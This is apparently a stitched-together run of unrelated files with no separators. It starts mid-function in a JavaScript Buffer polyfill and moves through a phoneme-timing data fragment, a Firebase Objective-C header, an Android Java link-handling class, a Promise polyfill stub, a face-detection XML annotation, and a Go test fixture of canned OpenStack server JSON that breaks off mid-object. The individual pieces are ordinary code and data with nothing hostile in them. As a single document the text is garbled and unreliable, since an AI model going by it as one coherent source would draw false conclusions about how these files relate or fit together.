codePoints.slice(i, i += MAX_ARGUMENTS_LENGTH)
)
}
return res
}
function asciiSlice (buf, start, end) {
var ret = ''
end = Math.min(buf.length, end)
for (var i = start; i < end; ++i) {
ret += String.fromCharCode(buf[i] & 0x7F)
}
return ret
}
function latin1Slice (buf, start, end) {
var ret = ''
end = Math.min(buf.length, end)
for (var i = start; i < end; ++i) {
ret += String.fromCharCode(buf[i])
}
return ret
}
function hexSlice (buf, start, end) {
var len = buf.length
if (!start || start < 0) start = 0
if (!end || end < 0 || end > len) end = len
var out = ''
for (var i = start; i < end; ++i) {
out += toHex(buf[i])
}
return out
}
function utf16leSlice (buf, start, end) {
var bytes = buf.slice(start, end)
var res = ''
for (var i = 0; i < bytes.length; i += 2) {
res += String.fromCharCode(bytes[i] + bytes[i + 1] * 256)
}
return res
}
Buffer.prototype.slice = function slice (start, end) {
var len = this.length
start = ~~start
end = end === undefined ? len : ~~end
if (start < 0) {
start += len
if (start < 0) start = 0
} else if (start > len) {
start = len
}
if (end < 0) {
end += len
if (end < 0) end = 0
} else if (end > len) {
end = len
}
if (end < start) end = start
var newBuf
if (Buffer.TYPED_ARRAY_SUPPORT) {
newBuf = this.subarray(start, end)
newBuf.__proto__ = Buffer.prototype
} else {
var sliceLen = end - start
newBuf = new Buffer(sliceLen, undefined)
for (var i = 0; i < sliceLen; ++i) {
newBuf[i] = this[i + start]
}
}
return newBuf
}
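// Usage sketch: with typed array support, slice() returns a view sharing memory with the
// parent (writes to the slice are visible in the original); the fallback path makes a
// byte-by-byte copy instead, as implemented above.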
/*
* Need to make sure that buffer isn't trying to write out of bounds.
*/
function checkOffset (offset, ext, length) {
if ((offset % 1) !== 0 || offset < 0) throw new RangeError('offset is not uint')
if (offset + ext > length) throw new RangeError('Trying to access beyond buffer length')
}
Buffer.prototype.readUIntLE = function readUIntLE (offset, byteLength, noAssert) {
offset = offset | 0
byteLength = byteLength | 0
if (!noAssert) checkOffset(offset, byteLength, this.length)
var val = this[offset]
var mul = 1
var i = 0
while (++i < byteLength && (mul *= 0x100)) {
val += this[offset + i] * mul
}
return val
}
Buffer.prototype.readUIntBE = function readUIntBE (offset, byteLength, noAssert) {
offset = offset | 0
byteLength = byteLength | 0
if (!noAssert) {
checkOffset(offset, byteLength, this.length)
}
var val = this[offset + --byteLength]
var mul = 1
while (byteLength > 0 && (mul *= 0x100)) {
val += this[offset + --byteLength] * mul
}
return val
}
Buffer.prototype.readUInt8 = function readUInt8 (offset, noAssert) {
if (!noAssert) checkOffset(offset, 1, this.length)
return this[offset]
}
Buffer.prototype.readUInt16LE = function readUInt16LE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 2, this.length)
return this[offset] | (this[offset + 1] << 8)
}
Buffer.prototype.readUInt16BE = function readUInt16BE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 2, this.length)
return (this[offset] << 8) | this[offset + 1]
}
Buffer.prototype.readUInt32LE = function readUInt32LE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 4, this.length)
return ((this[offset]) |
(this[offset + 1] << 8) |
(this[offset + 2] << 16)) +
(this[offset + 3] * 0x1000000)
}
Buffer.prototype.readUInt32BE = function readUInt32BE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 4, this.length)
return (this[offset] * 0x1000000) +
((this[offset + 1] << 16) |
(this[offset + 2] << 8) |
this[offset + 3])
}
Buffer.prototype.readIntLE = function readIntLE (offset, byteLength, noAssert) {
offset = offset | 0
byteLength = byteLength | 0
if (!noAssert) checkOffset(offset, byteLength, this.length)
var val = this[offset]
var mul = 1
var i = 0
while (++i < byteLength && (mul *= 0x100)) {
val += this[offset + i] * mul
}
mul *= 0x80
if (val >= mul) val -= Math.pow(2, 8 * byteLength)
return val
}
Buffer.prototype.readIntBE = function readIntBE (offset, byteLength, noAssert) {
offset = offset | 0
byteLength = byteLength | 0
if (!noAssert) checkOffset(offset, byteLength, this.length)
var i = byteLength
var mul = 1
var val = this[offset + --i]
while (i > 0 && (mul *= 0x100)) {
val += this[offset + --i] * mul
}
mul *= 0x80
if (val >= mul) val -= Math.pow(2, 8 * byteLength)
return val
}
Buffer.prototype.readInt8 = function readInt8 (offset, noAssert) {
if (!noAssert) checkOffset(offset, 1, this.length)
if (!(this[offset] & 0x80)) return (this[offset])
return ((0xff - this[offset] + 1) * -1)
}
Buffer.prototype.readInt16LE = function readInt16LE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 2, this.length)
var val = this[offset] | (this[offset + 1] << 8)
return (val & 0x8000) ? val | 0xFFFF0000 : val
}
Buffer.prototype.readInt16BE = function readInt16BE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 2, this.length)
var val = this[offset + 1] | (this[offset] << 8)
return (val & 0x8000) ? val | 0xFFFF0000 : val
}
Buffer.prototype.readInt32LE = function readInt32LE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 4, this.length)
return (this[offset]) |
(this[offset + 1] << 8) |
(this[offset + 2] << 16) |
(this[offset + 3] << 24)
}
Buffer.prototype.readInt32BE = function readInt32BE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 4, this.length)
return (this[offset] << 24) |
(this[offset + 1] << 16) |
(this[offset + 2] << 8) |
(this[offset + 3])
}
Buffer.prototype.readFloatLE = function readFloatLE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 4, this.length)
return ieee754.read(this, offset, true, 23, 4)
}
Buffer.prototype.readFloatBE = function readFloatBE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 4, this.length)
return ieee754.read(this, offset, false, 23, 4)
}
Buffer.prototype.readDoubleLE = function readDoubleLE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 8, this.length)
return ieee754.read(this, offset, true, 52, 8)
}
Buffer.prototype.readDoubleBE = function readDoubleBE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 8, this.length)
return ieee754.read(this, offset, false, 52, 8)
}
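// Usage sketch (hypothetical values): for var b = Buffer.from([0x12, 0x34, 0x56, 0x78]),
// b.readUInt16BE(0) is 0x1234, b.readUInt16LE(0) is 0x3412, and b.readUInt32BE(0) is
// 0x12345678; passing true for noAssert skips the bounds check in checkOffset().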
function checkInt (buf, value, offset, ext, max, min) {
if (!Buffer.isBuffer(buf)) throw new TypeError('"buffer" argument must be a Buffer instance')
if (value > max || value < min) throw new RangeError('"value" argument is out of bounds')
if (offset + ext > buf.length) throw new RangeError('Index out of range')
}
Buffer.prototype.writeUIntLE = function writeUIntLE (value, offset, byteLength, noAssert) {
value = +value
offset = offset | 0
byteLength = byteLength | 0
if (!noAssert) {
var maxBytes = Math.pow(2, 8 * byteLength) - 1
checkInt(this, value, offset, byteLength, maxBytes, 0)
}
var mul = 1
var i = 0
this[offset] = value & 0xFF
while (++i < byteLength && (mul *= 0x100)) {
this[offset + i] = (value / mul) & 0xFF
}
return offset + byteLength
}
Buffer.prototype.writeUIntBE = function writeUIntBE (value, offset, byteLength, noAssert) {
value = +value
offset = offset | 0
byteLength = byteLength | 0
if (!noAssert) {
var maxBytes = Math.pow(2, 8 * byteLength) - 1
checkInt(this, value, offset, byteLength, maxBytes, 0)
}
var i = byteLength - 1
var mul = 1
this[offset + i] = value & 0xFF
while (--i >= 0 && (mul *= 0x100)) {
this[offset + i] = (value / mul) & 0xFF
}
return offset + byteLength
}
Buffer.prototype.writeUInt8 = function writeUInt8 (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 1, 0xff, 0)
if (!Buffer.TYPED_ARRAY_SUPPORT) value = Math.floor(value)
this[offset] = (value & 0xff)
return offset + 1
}
function objectWriteUInt16 (buf, value, offset, littleEndian) {
if (value < 0) value = 0xffff + value + 1
for (var i = 0, j = Math.min(buf.length - offset, 2); i < j; ++i) {
buf[offset + i] = (value & (0xff << (8 * (littleEndian ? i : 1 - i)))) >>>
(littleEndian ? i : 1 - i) * 8
}
}
Buffer.prototype.writeUInt16LE = function writeUInt16LE (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 2, 0xffff, 0)
if (Buffer.TYPED_ARRAY_SUPPORT) {
this[offset] = (value & 0xff)
this[offset + 1] = (value >>> 8)
} else {
objectWriteUInt16(this, value, offset, true)
}
return offset + 2
}
Buffer.prototype.writeUInt16BE = function writeUInt16BE (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 2, 0xffff, 0)
if (Buffer.TYPED_ARRAY_SUPPORT) {
this[offset] = (value >>> 8)
this[offset + 1] = (value & 0xff)
} else {
objectWriteUInt16(this, value, offset, false)
}
return offset + 2
}
function objectWriteUInt32 (buf, value, offset, littleEndian) {
if (value < 0) value = 0xffffffff + value + 1
for (var i = 0, j = Math.min(buf.length - offset, 4); i < j; ++i) {
buf[offset + i] = (value >>> (littleEndian ? i : 3 - i) * 8) & 0xff
}
}
Buffer.prototype.writeUInt32LE = function writeUInt32LE (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 4, 0xffffffff, 0)
if (Buffer.TYPED_ARRAY_SUPPORT) {
this[offset + 3] = (value >>> 24)
this[offset + 2] = (value >>> 16)
this[offset + 1] = (value >>> 8)
this[offset] = (value & 0xff)
} else {
objectWriteUInt32(this, value, offset, true)
}
return offset + 4
}
Buffer.prototype.writeUInt32BE = function writeUInt32BE (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 4, 0xffffffff, 0)
if (Buffer.TYPED_ARRAY_SUPPORT) {
this[offset] = (value >>> 24)
this[offset + 1] = (value >>> 16)
this[offset + 2] = (value >>> 8)
this[offset + 3] = (value & 0xff)
} else {
objectWriteUInt32(this, value, offset, false)
}
return offset + 4
}
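// Usage sketch (hypothetical values): Buffer.alloc(4).writeUInt32BE(0x12345678, 0) stores the
// bytes 12 34 56 78 and returns the next offset (4); the LE variants store the same value with
// the byte order reversed.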
Buffer.prototype.writeIntLE = function writeIntLE (value, offset, byteLength, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) {
var limit = Math.pow(2, 8 * byteLength - 1)
checkInt(this, value, offset, byteLength, limit - 1, -limit)
}
var i = 0
var mul = 1
var sub = 0
this[offset] = value & 0xFF
while (++i < byteLength && (mul *= 0x100)) {
if (value < 0 && sub === 0 && this[offset + i - 1] !== 0) {
sub = 1
}
this[offset + i] = ((value / mul) >> 0) - sub & 0xFF
}
return offset + byteLength
}
Buffer.prototype.writeIntBE = function writeIntBE (value, offset, byteLength, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) {
var limit = Math.pow(2, 8 * byteLength - 1)
checkInt(this, value, offset, byteLength, limit - 1, -limit)
}
var i = byteLength - 1
var mul = 1
var sub = 0
this[offset + i] = value & 0xFF
while (--i >= 0 && (mul *= 0x100)) {
if (value < 0 && sub === 0 && this[offset + i + 1] !== 0) {
sub = 1
}
this[offset + i] = ((value / mul) >> 0) - sub & 0xFF
}
return offset + byteLength
}
Buffer.prototype.writeInt8 = function writeInt8 (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 1, 0x7f, -0x80)
if (!Buffer.TYPED_ARRAY_SUPPORT) value = Math.floor(value)
if (value < 0) value = 0xff + value + 1
this[offset] = (value & 0xff)
return offset + 1
}
Buffer.prototype.writeInt16LE = function writeInt16LE (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 2, 0x7fff, -0x8000)
if (Buffer.TYPED_ARRAY_SUPPORT) {
this[offset] = (value & 0xff)
this[offset + 1] = (value >>> 8)
} else {
objectWriteUInt16(this, value, offset, true)
}
return offset + 2
}
Buffer.prototype.writeInt16BE = function writeInt16BE (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 2, 0x7fff, -0x8000)
if (Buffer.TYPED_ARRAY_SUPPORT) {
this[offset] = (value >>> 8)
this[offset + 1] = (value & 0xff)
} else {
objectWriteUInt16(this, value, offset, false)
}
return offset + 2
}
Buffer.prototype.writeInt32LE = function writeInt32LE (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 4, 0x7fffffff, -0x80000000)
if (Buffer.TYPED_ARRAY_SUPPORT) {
this[offset] = (value & 0xff)
this[offset + 1] = (value >>> 8)
this[offset + 2] = (value >>> 16)
this[offset + 3] = (value >>> 24)
} else {
objectWriteUInt32(this, value, offset, true)
}
return offset + 4
}
Buffer.prototype.writeInt32BE = function writeInt32BE (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 4, 0x7fffffff, -0x80000000)
if (value < 0) value = 0xffffffff + value + 1
if (Buffer.TYPED_ARRAY_SUPPORT) {
this[offset] = (value >>> 24)
this[offset + 1] = (value >>> 16)
this[offset + 2] = (value >>> 8)
this[offset + 3] = (value & 0xff)
} else {
objectWriteUInt32(this, value, offset, false)
}
return offset + 4
}
function checkIEEE754 (buf, value, offset, ext, max, min) {
if (offset + ext > buf.length) throw new RangeError('Index out of range')
if (offset < 0) throw new RangeError('Index out of range')
}
function writeFloat (buf, value, offset, littleEndian, noAssert) {
if (!noAssert) {
checkIEEE754(buf, value, offset, 4, 3.4028234663852886e+38, -3.4028234663852886e+38)
}
ieee754.write(buf, value, offset, littleEndian, 23, 4)
return offset + 4
}
Buffer.prototype.writeFloatLE = function writeFloatLE (value, offset, noAssert) {
return writeFloat(this, value, offset, true, noAssert)
}
Buffer.prototype.writeFloatBE = function writeFloatBE (value, offset, noAssert) {
return writeFloat(this, value, offset, false, noAssert)
}
function writeDouble (buf, value, offset, littleEndian, noAssert) {
if (!noAssert) {
checkIEEE754(buf, value, offset, 8, 1.7976931348623157E+308, -1.7976931348623157E+308)
}
ieee754.write(buf, value, offset, littleEndian, 52, 8)
return offset + 8
}
Buffer.prototype.writeDoubleLE = function writeDoubleLE (value, offset, noAssert) {
return writeDouble(this, value, offset, true, noAssert)
}
Buffer.prototype.writeDoubleBE = function writeDoubleBE (value, offset, noAssert) {
return writeDouble(this, value, offset, false, noAssert)
}
// copy(targetBuffer, targetStart=0, sourceStart=0, sourceEnd=buffer.length)
Buffer.prototype.copy = function copy (target, targetStart, start, end) {
if (!start) start = 0
if (!end && end !== 0) end = this.length
if (targetStart >= target.length) targetStart = target.length
if (!targetStart) targetStart = 0
if (end > 0 && end < start) end = start
// Copy 0 bytes; we're done
if (end === start) return 0
if (target.length === 0 || this.length === 0) return 0
// Fatal error conditions
if (targetStart < 0) {
throw new RangeError('targetStart out of bounds')
}
if (start < 0 || start >= this.length) throw new RangeError('sourceStart out of bounds')
if (end < 0) throw new RangeError('sourceEnd out of bounds')
// Are we oob?
if (end > this.length) end = this.length
if (target.length - targetStart < end - start) {
end = target.length - targetStart + start
}
var len = end - start
var i
if (this === target && start < targetStart && targetStart < end) {
// descending copy from end
for (i = len - 1; i >= 0; --i) {
target[i + targetStart] = this[i + start]
}
} else if (len < 1000 || !Buffer.TYPED_ARRAY_SUPPORT) {
// ascending copy from start
for (i = 0; i < len; ++i) {
target[i + targetStart] = this[i + start]
}
} else {
Uint8Array.prototype.set.call(
target,
this.subarray(start, start + len),
targetStart
)
}
return len
}
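// Usage sketch (hypothetical values): src.copy(dst, 2, 0, 4) copies src[0..3] into dst starting
// at index 2 and returns the number of bytes copied; overlapping ranges within the same buffer
// are handled by the descending-copy branch above.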
// Usage:
// buffer.fill(number[, offset[, end]])
// buffer.fill(buffer[, offset[, end]])
// buffer.fill(string[, offset[, end]][, encoding])
Buffer.prototype.fill = function fill (val, start, end, encoding) {
// Handle string cases:
if (typeof val === 'string') {
if (typeof start === 'string') {
encoding = start
start = 0
end = this.length
} else if (typeof end === 'string') {
encoding = end
end = this.length
}
if (val.length === 1) {
var code = val.charCodeAt(0)
if (code < 256) {
val = code
}
}
if (encoding !== undefined && typeof encoding !== 'string') {
throw new TypeError('encoding must be a string')
}
if (typeof encoding === 'string' && !Buffer.isEncoding(encoding)) {
throw new TypeError('Unknown encoding: ' + encoding)
}
} else if (typeof val === 'number') {
val = val & 255
}
// Invalid ranges are not set to a default, so can range check early.
if (start < 0 || this.length < start || this.length < end) {
throw new RangeError('Out of range index')
}
if (end <= start) {
return this
}
start = start >>> 0
end = end === undefined ? this.length : end >>> 0
if (!val) val = 0
var i
if (typeof val === 'number') {
for (i = start; i < end; ++i) {
this[i] = val
}
} else {
var bytes = Buffer.isBuffer(val)
? val
: utf8ToBytes(new Buffer(val, encoding).toString())
var len = bytes.length
for (i = 0; i < end - start; ++i) {
this[i + start] = bytes[i % len]
}
}
return this
}
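// Usage sketch (hypothetical values): Buffer.alloc(4).fill(0xaa) yields <Buffer aa aa aa aa>,
// and Buffer.alloc(6).fill('ab') repeats the encoded bytes to give <Buffer 61 62 61 62 61 62>.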
// HELPER FUNCTIONS
// ================
var INVALID_BASE64_RE = /[^+\/0-9A-Za-z-_]/g
function base64clean (str) {
// Node strips out invalid characters like \n and \t from the string, base64-js does not
str = stringtrim(str).replace(INVALID_BASE64_RE, '')
// Node converts strings with length < 2 to ''
if (str.length < 2) return ''
// Node allows for non-padded base64 strings (missing trailing ===), base64-js does not
while (str.length % 4 !== 0) {
str = str + '='
}
return str
}
function stringtrim (str) {
if (str.trim) return str.trim()
return str.replace(/^\s+|\s+$/g, '')
}
function toHex (n) {
if (n < 16) return '0' + n.toString(16)
return n.toString(16)
}
function utf8ToBytes (string, units) {
units = units || Infinity
var codePoint
var length = string.length
var leadSurrogate = null
var bytes = []
for (var i = 0; i < length; ++i) {
codePoint = string.charCodeAt(i)
// is surrogate component
if (codePoint > 0xD7FF && codePoint < 0xE000) {
// last char was a lead
if (!leadSurrogate) {
// no lead yet
if (codePoint > 0xDBFF) {
// unexpected trail
if ((units -= 3) > -1) bytes.push(0xEF, 0xBF, 0xBD)
continue
} else if (i + 1 === length) {
// unpaired lead
if ((units -= 3) > -1) bytes.push(0xEF, 0xBF, 0xBD)
continue
}
// valid lead
leadSurrogate = codePoint
continue
}
// 2 leads in a row
if (codePoint < 0xDC00) {
if ((units -= 3) > -1) bytes.push(0xEF, 0xBF, 0xBD)
leadSurrogate = codePoint
continue
}
// valid surrogate pair
codePoint = (leadSurrogate - 0xD800 << 10 | codePoint - 0xDC00) + 0x10000
} else if (leadSurrogate) {
// valid bmp char, but last char was a lead
if ((units -= 3) > -1) bytes.push(0xEF, 0xBF, 0xBD)
}
leadSurrogate = null
// encode utf8
if (codePoint < 0x80) {
if ((units -= 1) < 0) break
bytes.push(codePoint)
} else if (codePoint < 0x800) {
if ((units -= 2) < 0) break
bytes.push(
codePoint >> 0x6 | 0xC0,
codePoint & 0x3F | 0x80
)
} else if (codePoint < 0x10000) {
if ((units -= 3) < 0) break
bytes.push(
codePoint >> 0xC | 0xE0,
codePoint >> 0x6 & 0x3F | 0x80,
codePoint & 0x3F | 0x80
)
} else if (codePoint < 0x110000) {
if ((units -= 4) < 0) break
bytes.push(
codePoint >> 0x12 | 0xF0,
codePoint >> 0xC & 0x3F | 0x80,
codePoint >> 0x6 & 0x3F | 0x80,
codePoint & 0x3F | 0x80
)
} else {
throw new Error('Invalid code point')
}
}
return bytes
}
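// Usage sketch (hypothetical values): utf8ToBytes('é') yields [0xC3, 0xA9]; an unpaired
// surrogate such as '\uD800' at the end of the string is replaced with the UTF-8 bytes for
// U+FFFD (0xEF 0xBF 0xBD), matching the lead/trail handling above.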
function asciiToBytes (str) {
var byteArray = []
for (var i = 0; i < str.length; ++i) {
// Node's code seems to be doing this and not & 0x7F..
byteArray.push(str.charCodeAt(i) & 0xFF)
}
return byteArray
}
function utf16leToBytes (str, units) {
var c, hi, lo
var byteArray = []
for (var i = 0; i < str.length; ++i) {
if ((units -= 2) < 0) break
c = str.charCodeAt(i)
hi = c >> 8
lo = c % 256
byteArray.push(lo)
byteArray.push(hi)
}
return byteArray
}
function base64ToBytes (str) {
return base64.toByteArray(base64clean(str))
}
function blitBuffer (src, dst, offset, length) {
for (var i = 0; i < length; ++i) {
if ((i + offset >= dst.length) || (i >= src.length)) break
dst[i + offset] = src[i]
}
return i
}
function isnan (val) {
return val !== val // eslint-disable-line no-self-compare
}
;link
l 58
I 55 0 230 80 213 100 213
N 68 100 196
k_h 84
_ 25
;not
n 58
A 120 0 221 80 204 100 204
t_h 93
_ 25
;active
{ 98 0 206 80 152 100 152
k_h 84
t_h 93
I 57 0 158 80 152 100 152
v 58
;to
t_h 78
u 200 0 154 80 147 100 147
_ 203
_ 1
/*
* Copyright 2017 Google
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#import <Foundation/Foundation.h>
@class FIRInstallations;
// A class that wraps the interactions for retrieving client-side info to be used as
// request parameters when interacting with Firebase in-app messaging (IAM) servers.
NS_ASSUME_NONNULL_BEGIN
@interface FIRIAMClientInfoFetcher : NSObject
- (instancetype)initWithFirebaseInstallations:(nullable FIRInstallations *)installations;
- (instancetype)init NS_UNAVAILABLE;
// Fetches the up-to-date Firebase Installation ID (FID) and Firebase Installation Service (FIS)
// token data. Since this involves a server interaction, a completion callback is provided for
// receiving the result.
- (void)fetchFirebaseInstallationDataWithProjectNumber:(NSString *)projectNumber
withCompletion:
(void (^)(NSString *_Nullable FID,
NSString *_Nullable FISToken,
NSError *_Nullable error))completion;
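// Usage sketch (hypothetical project number): a caller would typically invoke
//   [fetcher fetchFirebaseInstallationDataWithProjectNumber:@"1234567890"
//                                           withCompletion:^(NSString *FID, NSString *FISToken,
//                                                            NSError *error) {
//     // use FID/FISToken on success, inspect error otherwise
//   }];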
// Following are synchronous methods for fetching data
- (nullable NSString *)getDeviceLanguageCode;
- (nullable NSString *)getAppVersion;
- (nullable NSString *)getOSVersion;
- (nullable NSString *)getOSMajorVersion;
- (nullable NSString *)getTimezone;
- (NSString *)getIAMSDKVersion;
@end
NS_ASSUME_NONNULL_END
package me.saket.dank.utils;
import android.graphics.Point;
import android.text.Spannable;
import android.text.style.ClickableSpan;
import android.view.MotionEvent;
import android.widget.TextView;
import me.saket.bettermovementmethod.BetterLinkMovementMethod;
import me.saket.dank.utils.markdown.markwon.SpoilerRevealClickListenerSpan;
/**
* Extension of BetterLinkMovementMethod that also tracks the coordinates of a clicked link.
*/
public class DankLinkMovementMethod extends BetterLinkMovementMethod {
private Point clickedUrlCoordinates;
public static DankLinkMovementMethod newInstance() {
return new DankLinkMovementMethod();
}
public Point getLastUrlClickCoordinates() {
return clickedUrlCoordinates;
}
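  // Usage sketch (assumed wiring): install via
  // textView.setMovementMethod(DankLinkMovementMethod.newInstance()) and read
  // getLastUrlClickCoordinates() inside a URL click listener to anchor popups at the touch point.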
@Override
public boolean onTouchEvent(TextView view, Spannable text, MotionEvent event) {
if (event.getAction() == MotionEvent.ACTION_UP) {
// A link is potentially going to be clicked.
clickedUrlCoordinates = new Point((int) event.getRawX(), (int) event.getRawY());
}
return super.onTouchEvent(view, text, event);
}
@Override
protected void highlightUrl(TextView textView, ClickableSpan clickableSpan, Spannable text) {
if (clickableSpan instanceof SpoilerRevealClickListenerSpan) {
return;
}
super.highlightUrl(textView, clickableSpan, text);
}
@Override
protected void dispatchUrlClick(TextView textView, ClickableSpan clickableSpan) {
if (clickableSpan instanceof SpoilerRevealClickListenerSpan) {
clickableSpan.onClick(textView);
return;
}
super.dispatchUrlClick(textView, clickableSpan);
}
@Override
protected void dispatchUrlLongClick(TextView textView, ClickableSpan clickableSpan) {
if (!(clickableSpan instanceof SpoilerRevealClickListenerSpan)) {
super.dispatchUrlLongClick(textView, clickableSpan);
}
}
}
// not "use strict" so we can declare global "Promise"
var asap = require('asap');
if (typeof Promise === 'undefined') {
Promise = require('./lib/core.js')
require('./lib/es6-extensions.js')
}
require('./polyfill-done.js');
a 1
<annotation>
<folder>widerface</folder>
<filename>22--Picnic_22_Picnic_Picnic_22_68.jpg</filename>
<source>
<database>wider face Database</database>
<annotation>PASCAL VOC2007</annotation>
<image>flickr</image>
<flickrid>-1</flickrid>
</source>
<owner>
<flickrid>yanyu</flickrid>
<name>yanyu</name>
</owner>
<size>
<width>1024</width>
<height>1366</height>
<depth>3</depth>
</size>
<segmented>0</segmented>
<object>
<name>face</name>
<pose>Unspecified</pose>
<truncated>1</truncated>
<difficult>0</difficult>
<bndbox>
<xmin>393</xmin>
<ymin>806</ymin>
<xmax>456</xmax>
<ymax>881</ymax>
</bndbox>
<lm>
<x1>420.75</x1>
<y1>831.25</y1>
<x2>445.594</x2>
<y2>836.406</y2>
<x3>431.531</x3>
<y3>852.344</y3>
<x4>417.938</x4>
<y4>860.312</y4>
<x5>438.094</x5>
<y5>864.531</y5>
<visible>0</visible>
<blur>0.71</blur>
</lm>
<has_lm>1</has_lm>
</object>
<object>
<name>face</name>
<pose>Unspecified</pose>
<truncated>1</truncated>
<difficult>0</difficult>
<bndbox>
<xmin>487</xmin>
<ymin>757</ymin>
<xmax>530</xmax>
<ymax>817</ymax>
</bndbox>
<lm>
<x1>501.929</x1>
<y1>781.946</y1>
<x2>521.661</x2>
<y2>782.326</y2>
<x3>510.656</x3>
<y3>786.5</y3>
<x4>503.446</x4>
<y4>800.161</y4>
<x5>515.589</x5>
<y5>799.402</y5>
<visible>0</visible>
<blur>0.66</blur>
</lm>
<has_lm>1</has_lm>
</object>
<object>
<name>face</name>
<pose>Unspecified</pose>
<truncated>1</truncated>
<difficult>0</difficult>
<bndbox>
<xmin>563</xmin>
<ymin>717</ymin>
<xmax>621</xmax>
<ymax>787</ymax>
</bndbox>
<lm>
<x1>566.75</x1>
<y1>738.241</y1>
<x2>589.29</x2>
<y2>740.893</y2>
<x3>571.17</x3>
<y3>752.826</y3>
<x4>574.263</x4>
<y4>766.527</y4>
<x5>588.406</x5>
<y5>766.969</y5>
<visible>0</visible>
<blur>0.66</blur>
</lm>
<has_lm>1</has_lm>
</object>
<object>
<name>face</name>
<pose>Unspecified</pose>
<truncated>1</truncated>
<difficult>0</difficult>
<bndbox>
<xmin>771</xmin>
<ymin>812</ymin>
<xmax>815</xmax>
<ymax>882</ymax>
</bndbox>
<lm>
<x1>777.915</x1>
<y1>836.335</y1>
<x2>781.451</x2>
<y2>838.545</y2>
<x3>770.844</x3>
<y3>850.92</y3>
<x4>778.357</x4>
<y4>862.853</y4>
<x5>780.567</x5>
<y5>865.504</y5>
<visible>0</visible>
<blur>0.63</blur>
</lm>
<has_lm>1</has_lm>
</object>
</annotation>
// +build fixtures
package servers
import (
"fmt"
"net/http"
"testing"
th "github.com/rackspace/gophercloud/testhelper"
"github.com/rackspace/gophercloud/testhelper/client"
)
// ServerListBody contains the canned body of a servers.List response.
const ServerListBody = `
{
"servers": [
{
"status": "ACTIVE",
"updated": "2014-09-25T13:10:10Z",
"hostId": "29d3c8c896a45aa4c34e52247875d7fefc3d94bbcc9f622b5d204362",
"OS-EXT-SRV-ATTR:host": "devstack",
"addresses": {
"private": [
{
"OS-EXT-IPS-MAC:mac_addr": "fa:16:3e:7c:1b:2b",
"version": 4,
"addr": "10.0.0.32",
"OS-EXT-IPS:type": "fixed"
}
]
},
"links": [
{
"href": "http://104.130.131.164:8774/v2/fcad67a6189847c4aecfa3c81a05783b/servers/ef079b0c-e610-4dfb-b1aa-b49f07ac48e5",
"rel": "self"
},
{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/servers/ef079b0c-e610-4dfb-b1aa-b49f07ac48e5",
"rel": "bookmark"
}
],
"key_name": null,
"image": {
"id": "f90f6034-2570-4974-8351-6b49732ef2eb",
"links": [
{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/images/f90f6034-2570-4974-8351-6b49732ef2eb",
"rel": "bookmark"
}
]
},
"OS-EXT-STS:task_state": null,
"OS-EXT-STS:vm_state": "active",
"OS-EXT-SRV-ATTR:instance_name": "instance-0000001e",
"OS-SRV-USG:launched_at": "2014-09-25T13:10:10.000000",
"OS-EXT-SRV-ATTR:hypervisor_hostname": "devstack",
"flavor": {
"id": "1",
"links": [
{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/flavors/1",
"rel": "bookmark"
}
]
},
"id": "ef079b0c-e610-4dfb-b1aa-b49f07ac48e5",
"security_groups": [
{
"name": "default"
}
],
"OS-SRV-USG:terminated_at": null,
"OS-EXT-AZ:availability_zone": "nova",
"user_id": "9349aff8be7545ac9d2f1d00999a23cd",
"name": "herp",
"created": "2014-09-25T13:10:02Z",
"tenant_id": "fcad67a6189847c4aecfa3c81a05783b",
"OS-DCF:diskConfig": "MANUAL",
"os-extended-volumes:volumes_attached": [],
"accessIPv4": "",
"accessIPv6": "",
"progress": 0,
"OS-EXT-STS:power_state": 1,
"config_drive": "",
"metadata": {}
},
{
"status": "ACTIVE",
"updated": "2014-09-25T13:04:49Z",
"hostId": "29d3c8c896a45aa4c34e52247875d7fefc3d94bbcc9f622b5d204362",
"OS-EXT-SRV-ATTR:host": "devstack",
"addresses": {
"private": [
{
"OS-EXT-IPS-MAC:mac_addr": "fa:16:3e:9e:89:be",
"version": 4,
"addr": "10.0.0.31",
"OS-EXT-IPS:type": "fixed"
}
]
},
"links": [
{
"href": "http://104.130.131.164:8774/v2/fcad67a6189847c4aecfa3c81a05783b/servers/9e5476bd-a4ec-4653-93d6-72c93aa682ba",
"rel": "self"
},
{
